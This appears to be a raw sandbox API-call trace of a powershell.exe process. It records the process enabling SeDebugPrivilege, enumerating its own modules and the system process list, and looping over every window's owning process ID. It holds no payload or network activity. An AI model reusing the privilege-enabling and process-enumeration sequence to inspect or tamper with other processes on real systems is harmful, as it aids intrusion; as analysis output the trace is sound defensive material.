	[0319.890] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xadd88, puLen=0xadd80 | out: lplpBuffer=0xadd88*=0x0, puLen=0xadd80) returned 0
	[0319.890] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xadd88, puLen=0xadd80 | out: lplpBuffer=0xadd88*=0x0, puLen=0xadd80) returned 0
	[0319.890] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xadd58, puLen=0xadd50 | out: lplpBuffer=0xadd58*=0x2ce7374, puLen=0xadd50) returned 1
	[0319.891] CoTaskMemAlloc (cb=0x204) returned 0x202b30
	[0319.891] VerLanguageNameW (in: wLang=0x0, szLang=0x202b30, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0319.892] CoTaskMemFree (pv=0x202b30) 
	[0319.892] VerQueryValueW (in: pBlock=0x2ce72d8, lpSubBlock="\\", lplpBuffer=0xadda8, puLen=0xadda0 | out: lplpBuffer=0xadda8*=0x2ce7300, puLen=0xadda0) returned 1
	[0319.898] GetCurrentProcessId () returned 0x97c
	[0320.359] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xaccd0 | out: lpLuid=0xaccd0*(LowPart=0x14, HighPart=0)) returned 1
	[0320.362] GetCurrentProcess () returned 0xffffffffffffffff
	[0320.363] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xaccf0 | out: TokenHandle=0xaccf0*=0x2e4) returned 1
	[0320.364] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x2ceab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0320.368] CloseHandle (hObject=0x2e4) returned 1
	[0320.372] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x97c) returned 0x2e4
	[0320.381] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2ceabb8, cb=0x200, lpcbNeeded=0xadd08 | out: lphModule=0x2ceabb8, lpcbNeeded=0xadd08) returned 1
	[0320.383] GetModuleInformation (in: hProcess=0x2e4, hModule=0x13f370000, lpmodinfo=0x2ceae28, cb=0x18 | out: lpmodinfo=0x2ceae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0320.384] CoTaskMemAlloc (cb=0x804) returned 0x25ff60
	[0320.384] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x13f370000, lpBaseName=0x25ff60, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0320.384] CoTaskMemFree (pv=0x25ff60) 
	[0320.385] CoTaskMemAlloc (cb=0x804) returned 0x25ff60
	[0320.385] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x13f370000, lpFilename=0x25ff60, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0320.386] CoTaskMemFree (pv=0x25ff60) 
	[0320.387] CloseHandle (hObject=0x2e4) returned 1
	[0320.394] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x97c) returned 0x2e4
	[0320.395] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0xade38 | out: lpExitCode=0xade38*=0x103) returned 1
	[0320.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ceb088, Length=0x20000, ResultLength=0xade00 | out: SystemInformation=0x12ceb088, ResultLength=0xade00*=0x17af8) returned 0x0
	[0320.774] EnumWindows (lpEnumFunc=0x29866ac, lParam=0x0) returned 1
	[0320.775] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.775] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x558
	[0320.775] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.775] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.775] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.775] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x538
	[0320.775] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.776] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x778
	[0320.776] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x778
	[0320.776] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.776] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.776] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.776] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.776] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.776] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.776] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.776] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.776] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x460
	[0320.777] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.777] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.777] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xd94
	[0320.777] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xd74
	[0320.777] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xd00
	[0320.777] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xcd8
	[0320.777] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xc84
	[0320.777] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xca4
	[0320.778] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xc64
	[0320.778] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xc24
	[0320.778] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xb84
	[0320.778] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xbac
	[0320.778] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x384
	[0320.778] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xab8
	[0320.778] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x33c
	[0320.778] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xa44
	[0320.778] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xa64
	[0320.779] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x8a8
	[0320.779] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xaf0
	[0320.779] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x88c
	[0320.779] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xb04
	[0320.779] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x910
	[0320.779] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x230
	[0320.779] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xac0
	[0320.779] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xab4
	[0320.780] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xaac
	[0320.780] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x3d0
	[0320.780] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x978
	[0320.780] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xa7c
	[0320.781] GetWindow (hWnd=0x10228, uCmd=0x4) returned 0x0
	[0320.782] IsWindowVisible (hWnd=0x10228) returned 0
	[0320.782] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x59c
	[0320.782] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xa88
	[0320.782] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xa6c
	[0320.782] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xa68
	[0320.782] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x9f8
	[0320.782] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xa04
	[0320.782] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x924
	[0320.782] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x8dc
	[0320.783] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x7dc
	[0320.783] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x768
	[0320.783] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x764
	[0320.783] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x820
	[0320.783] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x810
	[0320.783] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x794
	[0320.783] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x83c
	[0320.783] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x7ac
	[0320.784] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xb44
	[0320.784] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xb5c
	[0320.784] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x838
	[0320.784] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.784] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.784] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.784] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.784] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.785] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.785] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.785] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.785] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x818
	[0320.785] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x5b8
	[0320.785] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x494
	[0320.785] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x1ec
	[0320.785] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x440
	[0320.785] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x7e8
	[0320.786] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x730
	[0320.786] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x2c8
	[0320.786] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x31c
	[0320.786] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x330
	[0320.786] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x128
	[0320.786] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x5c8
	[0320.786] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x6f8
	[0320.786] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x358
	[0320.787] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x73c
	[0320.787] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xb0
	[0320.787] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x250
	[0320.787] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x240
	[0320.787] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x790
	[0320.787] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x61c
	[0320.787] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x540
	[0320.787] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x538
	[0320.788] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x568
	[0320.788] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x538
	[0320.788] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x568
	[0320.788] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x538
	[0320.788] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x540
	[0320.788] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x540
	[0320.788] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x57c
	[0320.788] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x460
	[0320.788] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x554
	[0320.789] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.789] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x528
	[0320.789] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.789] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.789] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.789] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x79c
	[0320.789] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.789] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4e0
	[0320.790] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.790] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x460
	[0320.790] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x460
	[0320.790] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x44c
	[0320.790] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x778
	[0320.790] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x460
	[0320.790] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x558
	[0320.790] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.791] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4d0
	[0320.791] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xde0
	[0320.791] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xddc
	[0320.791] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xdd8
	[0320.791] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xd34
	[0320.791] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xd10
	[0320.791] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xd0c
	[0320.791] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xc9c
	[0320.792] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xc74
	[0320.792] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xc1c
	[0320.792] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xc08
	[0320.792] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xabc
	[0320.792] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x24c
	[0320.792] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xbb0
	[0320.792] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xbfc
	[0320.792] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xb10
	[0320.792] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x374
	[0320.793] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x368
	[0320.793] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xb28
	[0320.793] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xae8
	[0320.793] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xb14
	[0320.793] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x95c
	[0320.793] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xa8c
	[0320.793] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x46c
	[0320.793] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xb3c
	[0320.794] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xa90
	[0320.794] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xad0
	[0320.794] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xa9c
	[0320.794] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xaa0
	[0320.794] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xb1c
	[0320.794] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x7e0
	[0320.794] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xa74
	[0320.794] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x694
	[0320.795] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xa28
	[0320.795] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x9b0
	[0320.795] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x8d8
	[0320.795] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x940
	[0320.795] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x93c
	[0320.795] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x4ec
	[0320.795] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x150
	[0320.795] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x720
	[0320.795] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x3c4
	[0320.796] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x7d4
	[0320.796] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x6c8
	[0320.796] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xb54
	[0320.796] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xb54
	[0320.796] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0xb5c
	[0320.796] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x838
	[0320.796] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x818
	[0320.796] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x5b8
	[0320.797] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x494
	[0320.797] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x1ec
	[0320.797] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xadb60 | out: lpdwProcessId=0xadb60) returned 0x440
